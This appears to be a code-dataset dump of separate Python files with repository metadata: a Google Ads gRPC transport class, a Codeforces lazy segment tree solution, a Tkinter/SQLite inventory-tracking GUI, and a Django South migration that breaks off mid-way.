client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_location_view(
self,
) -> Callable[
[location_view_service.GetLocationViewRequest],
location_view.LocationView,
]:
r"""Return a callable for the get location view method over gRPC.
Returns the requested location view in full detail.
Returns:
Callable[[~.GetLocationViewRequest],
~.LocationView]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_location_view" not in self._stubs:
self._stubs["get_location_view"] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v5.services.LocationViewService/GetLocationView",
request_serializer=location_view_service.GetLocationViewRequest.serialize,
response_deserializer=location_view.LocationView.deserialize,
)
return self._stubs["get_location_view"]
__all__ = ("LocationViewServiceGrpcTransport",)
| 41.281633
| 90
| 0.6228
|
a439b267021d7c5df887c99d6d3d4c3e5e0da21f
| 4,797
|
py
|
Python
|
segment tree 2/2E.py
|
iammanish17/CodeforcesEdu
|
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
|
[
"MIT"
] | 6
|
2020-09-14T19:16:23.000Z
|
2021-12-10T19:07:51.000Z
|
segment tree 2/2E.py
|
iammanish17/CodeforcesEdu
|
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
|
[
"MIT"
] | null | null | null |
segment tree 2/2E.py
|
iammanish17/CodeforcesEdu
|
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
|
[
"MIT"
] | 1
|
2021-08-12T19:37:22.000Z
|
2021-08-12T19:37:22.000Z
|
# By manish.17, contest: ITMO Academy. Дерево отрезков 2 - 2, problem: (E) Assignment and Minimum
# https://codeforces.com/profile/manish.17
import os
import sys
from io import BytesIO, IOBase
BUFSIZE = 8192
class FastIO(IOBase):
newlines = 0
def __init__(self, file):
self._fd = file.fileno()
self.buffer = BytesIO()
self.writable = "x" in file.mode or "r" not in file.mode
self.write = self.buffer.write if self.writable else None
def read(self):
while True:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
if not b:
break
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines = 0
return self.buffer.read()
def readline(self):
while self.newlines == 0:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
self.newlines = b.count(b"\n") + (not b)
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines -= 1
return self.buffer.readline()
def flush(self):
if self.writable:
os.write(self._fd, self.buffer.getvalue())
self.buffer.truncate(0), self.buffer.seek(0)
class IOWrapper(IOBase):
def __init__(self, file):
self.buffer = FastIO(file)
self.flush = self.buffer.flush
self.writable = self.buffer.writable
self.write = lambda s: self.buffer.write(s.encode("ascii"))
self.read = lambda: self.buffer.read().decode("ascii")
self.readline = lambda: self.buffer.readline().decode("ascii")
sys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)
input = lambda: sys.stdin.readline().rstrip("\r\n")
from math import inf, log2
class LazySegmentTree:
def __init__(self, array, func=max):
self.n = len(array)
self.size = 2 ** (int(log2(self.n - 1)) + 1) if self.n != 1 else 1
self.func = func
self.default = 0 if self.func != min else inf
self.data = [self.default] * (2 * self.size)
self.lazy = [None] * (2 * self.size)
self.process(array)
def process(self, array):
self.data[self.size: self.size + self.n] = array
for i in range(self.size - 1, -1, -1):
self.data[i] = self.func(self.data[2 * i], self.data[2 * i + 1])
def push(self, index):
"""Push the information of the root to it's children!"""
if self.lazy[index] is None or 2*index + 1 >= 2*self.size:return
self.lazy[2 * index] = self.lazy[index]
self.lazy[2 * index + 1] = self.lazy[index]
self.data[2 * index] = self.lazy[index]
self.data[2 * index + 1] = self.lazy[index]
self.lazy[index] = None
def build(self, index, value):
"""Build data with the new changes!"""
index >>= 1
while index:
self.data[index] = self.func(self.data[2 * index], self.data[2 * index + 1]) if self.lazy[index] is None else self.lazy[index]
index >>= 1
def query(self, alpha, omega):
"""Returns the result of function over the range (inclusive)!"""
res = self.default
alpha += self.size
omega += self.size + 1
for i in reversed(range(1, alpha.bit_length())):
self.push(alpha >> i)
for i in range(len(bin(omega - 1)[2:]) - 1, 0, -1):
self.push((omega-1) >> i)
while alpha < omega:
if alpha & 1:
res = self.func(res, self.data[alpha])
alpha += 1
if omega & 1:
omega -= 1
res = self.func(res, self.data[omega])
alpha >>= 1
omega >>= 1
return res
def update(self, alpha, omega, value):
alpha += self.size
omega += self.size + 1
for i in reversed(range(1, alpha.bit_length())):
self.push(alpha >> i)
for i in reversed(range(1, omega.bit_length())):
self.push(omega >> i)
l, r = alpha, omega
while alpha < omega:
if alpha & 1:
self.data[alpha] = value
self.lazy[alpha] = value
alpha += 1
if omega & 1:
omega -= 1
self.data[omega] = value
self.lazy[omega] = value
alpha >>= 1
omega >>= 1
self.build(l, value)
self.build(r - 1, value)
n, m = map(int, input().split())
st = LazySegmentTree([0]*n, func=min)
for _ in range(m):
a = list(map(int, input().split()))
if a[0] == 1:
st.update(a[1], a[2]-1, a[3])
else:
print(st.query(a[1], a[2]-1))
| 33.545455
| 138
| 0.543673
|
d4a661f5d8a0b900ebf54dfd1e80945fe2156980
| 26,488
|
py
|
Python
|
Windows_Version.py
|
radonintro1234/inventory-tracking-system
|
df26907630a19cb10a720ad111173a381bd530ff
|
[
"MIT"
] | null | null | null |
Windows_Version.py
|
radonintro1234/inventory-tracking-system
|
df26907630a19cb10a720ad111173a381bd530ff
|
[
"MIT"
] | null | null | null |
Windows_Version.py
|
radonintro1234/inventory-tracking-system
|
df26907630a19cb10a720ad111173a381bd530ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
__version__ = "0.1.1 for Windows 10"
__author__ = "Rishi Mule, Shubham Mulik, Gaurav Gend, Vedant Padwal"
__license__ = 'MIT'
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from dbToCSV import toCSV
from csvToPdf import CsvtoPDF
from dialog import OptionDialog
import pymysql
import sqlite3
def create_database():
"""Function to create a Database"""
conn = sqlite3.connect('inventory.db')
cur = conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS dmce_inventory (product_id text PRIMARY KEY , product_type text , model_no text , manufacturer text , department text , location text ,incharge text, comment text)")
conn.commit()
conn.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
class Inventory():
"""Creating a main window on Inventory"""
def __init__(self, root):
"""Default __INIT__ Function"""
self.root=root
self.root.title("I.T.S - For Datta Meghe College Of Engineering")
self.root.geometry("1200x660+160+80")
self.root.resizable(0, 0)
self.product_id_var = StringVar()
self.product_type_var = StringVar()
self.model_no_var = StringVar()
self.manufacturer_var = StringVar()
self.department_var = StringVar()
self.location_var = StringVar()
self.incharge_var = StringVar()
self.search_by_var = StringVar()
self.search_txt_var = StringVar()
head_title = Label(self.root,text="Inventory Tracking System",bd=10, relief=GROOVE, font=("ariel", 20 , "bold"), bg="RED", fg="white")
head_title.pack(side="top", pady=20, padx=10, fill=X)
#===================================================================================================================================
#===============================MANAGE_FRAME========================================================================================
#===================================================================================================================================
Manage_Frame=Frame(self.root, bd=5, relief=RIDGE, bg="crimson")
Manage_Frame.place(x=10, y=80, width=350, height=570)
m_title=Label(Manage_Frame,text="Manage Inventory", font=("", 20 , "bold"), bg="crimson", fg="white")
m_title.grid(row=0, columnspan=2, pady=20)
#------------------------------------------------------------------------------------------------------------------------------------
def caps(event):
"""Function to Convert Text To UPPERCAP"""
self.product_id_var.set(self.product_id_var.get().upper())
self.product_type_var.set(self.product_type_var.get().upper())
self.model_no_var.set(self.model_no_var.get().upper())
self.manufacturer_var.set(self.manufacturer_var.get().upper())
self.location_var.set(self.location_var.get().upper())
self.incharge_var.set(self.incharge_var.get().upper())
self.search_txt_var.set(self.search_txt_var.get().upper())
#------------------------------------------------------------------------------------------------------------------------------------
lbl_product_id=Label(Manage_Frame,text="Product ID : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_product_id.grid(row=1, column=0, padx=10, pady=10,sticky ="w")
txt_product_id=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.product_id_var)
txt_product_id.bind("<KeyRelease>", caps)
txt_product_id.grid(row=1, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_type=Label(Manage_Frame,text="Product Type : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_type.grid(row=2, column=0, padx=10, pady=10,sticky ="w")
txt_type=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.product_type_var)
txt_type.bind("<KeyRelease>", caps)
txt_type.grid(row=2, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_model_no=Label(Manage_Frame,text="Model No : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_model_no.grid(row=3, column=0, padx=10, pady=10,sticky ="w")
txt_model_id=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.model_no_var)
txt_model_id.bind("<KeyRelease>", caps)
txt_model_id.grid(row=3, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_manufacturer=Label(Manage_Frame,text="Manufacturer : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_manufacturer.grid(row=4, column=0, padx=10, pady=10,sticky ="w")
txt_manufacturer=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.manufacturer_var)
txt_manufacturer.bind("<KeyRelease>", caps)
txt_manufacturer.grid(row=4, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_department=Label(Manage_Frame,text="Department : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_department.grid(row=5, column=0, padx=10, pady=10,sticky ="w")
combo_department=ttk.Combobox(Manage_Frame, width=18, font=("", 13, "bold" ), state="readonly" , textvariable=self.department_var)
combo_department["values"]=("COMPUTER","ELECTRICAL","CIVIL","MECHANICAL","CHEMICAL","I.T.")
combo_department.current(0)
combo_department.grid(row=5, column=1, padx=10, pady=10,sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_location=Label(Manage_Frame,text="Location : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_location.grid(row=6, column=0, padx=10, pady=10,sticky ="w")
txt_location=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.location_var)
txt_location.bind("<KeyRelease>", caps)
txt_location.grid(row=6, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_incharge=Label(Manage_Frame,text="Incharge : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_incharge.grid(row=7, column=0, padx=10, pady=10,sticky ="w")
txt_incharge=Entry(Manage_Frame, font=("times new roman", 13 , "bold") ,bd=2, relief=GROOVE, textvariable=self.incharge_var)
txt_incharge.bind("<KeyRelease>", caps)
txt_incharge.grid(row=7, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
lbl_comment=Label(Manage_Frame,text="Comment : ", font=("", 10 , "bold"), bg="crimson", fg="white")
lbl_comment.grid(row=8, column=0, padx=10, pady=10,sticky ="w")
self.txt_comment=Text(Manage_Frame, width=20, height=3, bd=2, relief=GROOVE, font=("times new roman", 13 , ""))
self.txt_comment.grid(row=8, column=1, padx=10, pady=10, sticky ="w")
#------------------------------------------------------------------------------------------------------------------------------------
#===================================================================================================================================
#==========================BUTTON_FRAME=============================================================================================
#===================================================================================================================================
Button_Frame=Frame(Manage_Frame, bd=4, relief=RIDGE, bg="yellow")
Button_Frame.place(x=5, y=500, width=330, height=50)
#------------------------------------------------------------------------------------------------------------------------------------
add_button=Button(Button_Frame, text="Add", width=8, highlightbackground="yellow", command=self.add_items)
add_button.grid(row=0, column=0, padx=5, pady=7)
#------------------------------------------------------------------------------------------------------------------------------------
update_button=Button(Button_Frame, text="Update", width=8, highlightbackground="yellow", command=self.update_data)
update_button.grid(row=0, column=1, padx=5, pady=7)
#------------------------------------------------------------------------------------------------------------------------------------
delete_button=Button(Button_Frame, text="Delete", width=8, highlightbackground="yellow", command=self.delete_data)
delete_button.grid(row=0, column=2, padx=5, pady=7)
#------------------------------------------------------------------------------------------------------------------------------------
clear_button=Button(Button_Frame, text="Clear", width=10, highlightbackground="yellow", command=self.clear)
clear_button.grid(row=0, column=3, padx=5, pady=7)
#===================================================================================================================================
#==========================DETAIL_FRAME=============================================================================================
#===================================================================================================================================
Detail_Frame=Frame(self.root, bd=4, relief=RIDGE, bg="crimson")
Detail_Frame.place(x=370, y=80, width=820, height=570)
#===================================================================================================================================
#==========================SEARCH_FRAME=============================================================================================
#===================================================================================================================================
Search_Frame=Frame(Detail_Frame, bd=4, relief=RIDGE, bg="yellow")
Search_Frame.place(x=10, y=10, width=792, height=60)
lbl_search=Label(Search_Frame,text="Search By : ", font=("", 13 , "bold"), bg="yellow", fg="red")
lbl_search.grid(row=0, column=0, padx=10, pady=10,sticky ="w")
combo_search_by=ttk.Combobox(Search_Frame, width=13, font=("", 13, "" ), state="readonly", textvariable=self.search_by_var)
combo_search_by["values"]=("All","Product ID.","Product Type","Model No","Manufacturer","Department","Location","Incharge")
combo_search_by.current(0)
combo_search_by.grid(row=0, column=1, padx=2, pady=10,sticky ="w")
txt_search=Entry(Search_Frame, width=22,font=("times new roman", 15 ) ,bd=2, relief=GROOVE, textvariable=self.search_txt_var)
txt_search.bind("<KeyRelease>", caps)
txt_search.grid(row=0, column=2, padx=20, pady=10, sticky ="w")
search_button=Button(Search_Frame, text="Search", width=8, highlightbackground="yellow", command=self.search_data)
search_button.grid(row=0, column=3, padx=4, pady=5)
view_button=Button(Search_Frame, text="View All", width=8, highlightbackground="yellow", command=self.view_data)
view_button.grid(row=0, column=4, padx=9, pady=5)
tocsv_button=Button(Search_Frame, text="Export", width=8, highlightbackground="yellow", command=self.export_data)
tocsv_button.grid(row=0, column=5, padx=9, pady=5)
#===================================================================================================================================
#==========================TABLE_FRAME=============================================================================================
#===================================================================================================================================
Table_Frame=Frame(Detail_Frame, bd=4, relief=RIDGE, bg="yellow")
Table_Frame.place(x=10, y=80, width=792, height=472)
scroll_x=Scrollbar(Table_Frame, orient=HORIZONTAL)
scroll_y=Scrollbar(Table_Frame, orient=VERTICAL)
self.View_Table=ttk.Treeview(Table_Frame, columns=("pid","ptype","mno","manufacturer","department","location","incharge","comment"), xscrollcommand=scroll_x.set, yscrollcommand=scroll_y.set)
scroll_x.pack(side=BOTTOM, fill=X)
scroll_y.pack(side=RIGHT, fill=Y)
scroll_x.config(command=self.View_Table.xview)
scroll_y.config(command=self.View_Table.yview)
self.View_Table.heading("pid", text="Product ID.")
self.View_Table.heading("ptype", text="Product Type")
self.View_Table.heading("mno", text="Model No")
self.View_Table.heading("manufacturer", text="Manufacturer")
self.View_Table.heading("department", text="Department")
self.View_Table.heading("location", text="Location")
self.View_Table.heading("incharge", text="Incharge")
self.View_Table.heading("comment", text="Comment")
self.View_Table.column("pid", width=90)
self.View_Table.column("ptype", width=100)
self.View_Table.column("mno", width=120)
self.View_Table.column("manufacturer", width=90)
self.View_Table.column("department", width=120)
self.View_Table.column("location", width=90)
self.View_Table.column("incharge", width=130)
self.View_Table.column("comment", width=250)
self.View_Table["show"]="headings"
self.View_Table.pack(fill=BOTH, expand=1)
self.View_Table.bind("<ButtonRelease-1>", self.get_cursor)
self.view_data()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def add_items(self):
"""Function to ADD item to Database"""
if self.product_id_var.get()=="":
messagebox.showerror("Error","Product ID. cannot be blank!!!")
else:
try:
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute(" insert into dmce_inventory values (?,?,?,?,?,?,?,?)",(
self.product_id_var.get(),
self.product_type_var.get(),
self.model_no_var.get(),
self.manufacturer_var.get(),
self.department_var.get(),
self.location_var.get(),
self.incharge_var.get(),
self.txt_comment.get('1.0',END),
))
con.commit()
self.view_data()
con.close()
except:
pass
else:
self.clear()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def export_data(self):
"""Function to Expoet data into various Formats"""
que1 = messagebox.askquestion( "Export",
"Do you want to export to CSV?",
icon ='info')
if que1 == 'yes':
toCSV()
que2 = messagebox.askquestion( "Export",
"Do you want to export to PDF?",
icon ='info')
if que2 == 'yes':
CsvtoPDF()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def view_data(self):
"""Function to VIEW data into Table"""
self.search_txt_var.set("")
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute("select * from dmce_inventory")
rows=cur.fetchall()
self.View_Table.delete(*self.View_Table.get_children())
if len(rows)!=0:
for row in rows:
self.View_Table.insert("", END, values=row)
con.commit()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def clear(self):
"""Function to CLEAR all Input Fields"""
self.product_id_var.set("")
self.product_type_var.set("")
self.model_no_var.set("")
self.manufacturer_var.set("")
self.location_var.set("")
self.incharge_var.set("")
self.txt_comment.delete("1.0", END)
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def get_cursor(self,event):
"""Function to SELECT a particular item"""
try:
cursor_row=self.View_Table.focus()
contents=self.View_Table.item(cursor_row)
row=contents["values"]
self.product_id_var.set(row[0])
self.product_type_var.set(row[1])
self.model_no_var.set(row[2])
self.manufacturer_var.set(row[3])
self.department_var.set(row[4])
self.location_var.set(row[5])
self.incharge_var.set(row[6])
self.txt_comment.delete("1.0", END)
self.txt_comment.insert(END, row[7])
except:
pass
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def update_data(self):
"""Function to UPDATE an item of Database"""
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute("update dmce_inventory set product_type=? , model_no=? , manufacturer=? , department=? , location=? ,incharge=?, comment=? where product_id=?",(
self.product_type_var.get(),
self.model_no_var.get(),
self.manufacturer_var.get(),
self.department_var.get(),
self.location_var.get(),
self.incharge_var.get(),
self.txt_comment.get('1.0',END),
self.product_id_var.get()
))
con.commit()
self.view_data()
self.clear()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def delete_data(self):
"""Function to DELETE an item from the Database"""
con=sqlite3.connect('inventory.db')
cur=con.cursor()
cur.execute("delete from dmce_inventory where product_id=?",(self.product_id_var.get(),))
con.commit()
self.view_data()
self.clear()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
def search_data(self):
"""Function to Search for items in Database"""
con=sqlite3.connect('inventory.db')
cur=con.cursor()
if self.search_by_var.get()=="Product ID.":
cur.execute("select * from dmce_inventory where product_id=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Product Type":
cur.execute("select * from dmce_inventory where product_type=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Model No":
cur.execute("select * from dmce_inventory where model_no=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Manufacturer":
cur.execute("select * from dmce_inventory where manufacturer=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Department":
cur.execute("select * from dmce_inventory where department=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Location":
cur.execute("select * from dmce_inventory where location=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
elif self.search_by_var.get()=="Incharge":
cur.execute("select * from dmce_inventory where incharge=?", ( self.search_txt_var.get(),))
rows=cur.fetchall()
else:
cur.execute("select * from dmce_inventory where product_id=? OR product_type=? OR model_no=? OR manufacturer=? OR department=? OR location=? OR incharge=?", (
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
self.search_txt_var.get(),
))
rows=cur.fetchall()
self.View_Table.delete(*self.View_Table.get_children())
if len(rows)!=0:
for row in rows:
self.View_Table.insert("", END, values=row)
con.commit()
con.close()
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
"""START THE PROGRAM"""
create_database()
root = Tk()
root.title("Inventory Tracking System")
root.iconbitmap("its_icon.ico")
ob = Inventory(root)
root.mainloop()
| 56.598291
| 218
| 0.39516
|
bd76b6b6ee215e096b2b0924ab60e7d5ae5c5080
| 6,057
|
py
|
Python
|
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
|
kohout/djangocms-getaweb-events
|
e02f635748c919ba4092790d5c14d05645cd8bc9
|
[
"Unlicense"
] | null | null | null |
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
|
kohout/djangocms-getaweb-events
|
e02f635748c919ba4092790d5c14d05645cd8bc9
|
[
"Unlicense"
] | null | null | null |
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
|
kohout/djangocms-getaweb-events
|
e02f635748c919ba4092790d5c14d05645cd8bc9
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Event.target_page'
db.add_column(u'djangocms_events_event', 'target_page',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'], null=True, blank=True),
keep_default=False)
# Removing M2M table for field target_page on 'Event'
db.delete_table(db.shorten_name(u'djangocms_events_event_target_page'))
def backwards(self, orm):
# Deleting field 'Event.target_page'
db.delete_column(u'djangocms_events_event', 'target_page_id')
# Adding M2M table for field target_page on 'Event'
m2m_table_name = db.shorten_name(u'djangocms_events_event_target_page')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('event', models.ForeignKey(orm[u'djangocms_events.event'], null=False)),
('site', models.ForeignKey(orm[u'sites.site'], null=False))
))
db.create_unique(m2m_table_name, ['event_id', 'site_id'])
models = {
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
u'djangocms_events.event': {
'Meta': {'ordering': "['start_date', 'start_time', 'end_date', 'end_time']", 'object_name': 'Event'},
'description': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['djangocms_events.Tag']", 'null': 'True', 'blank': 'True'}),
'target_page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'})
},
u'djangocms_events.eventslist': {
'Meta': {'object_name': 'EventsList', '_ormbases': ['cms.CMSPlugin']},
'archive': ('django.db.models.fields.CharField', [], {'default': "('all', u'All Events')", 'max_length': '50'}),
'category': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['djangocms_events.Tag']", 'null': 'True', 'blank': 'True'}),
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'max_item_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'target_page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'djangocms_events.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
